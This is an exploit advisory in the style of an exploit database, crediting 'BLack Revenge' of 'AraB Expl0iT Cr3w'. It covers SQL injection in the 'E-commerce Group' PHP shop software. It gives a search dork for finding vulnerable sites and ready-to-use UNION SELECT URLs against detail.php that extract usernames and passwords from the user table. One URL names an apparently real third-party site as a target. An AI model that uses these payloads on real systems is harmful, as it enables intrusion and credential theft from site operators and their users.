E-Commerce Group SQL Injection

`  
  
Exploit Title: E-commerce Group (cat.php) SQL Injection Vulnerability  
# Date: 2010/05/21  
# Author:BLack Revenge  
# Software Link:  
# Version:  
# Tested on:  
# CVE :  
==============================  
[#]E-commerce Group (cat.php) SQL Injection Vulnerability  
[#]Founder: BLaCk RevenGe  
Email:- [email protected]  
WwW.AraB-ExplOiT.CoM[#]  
AraB Expl0iT Cr3w  
-----------------------------------------------------------  
==============================  
Dork :Designed and Developed by karkia <http://www.karkia.org/> E-commerce  
Group. Copyright 2007  
  
SQL Injection  
http://www.Site.com/path/detail.php?id=1 -->SQL Injection  
  
Demo:-  
Password Injection #  
  
http://www.localhost.com/shop/detail.php?id=-647+union+select+1,2,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user  
----------------------------  
User Injection#  
  
http://www.iran-new.com/shop/detail.php?id=-647+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user  
  
  
  
`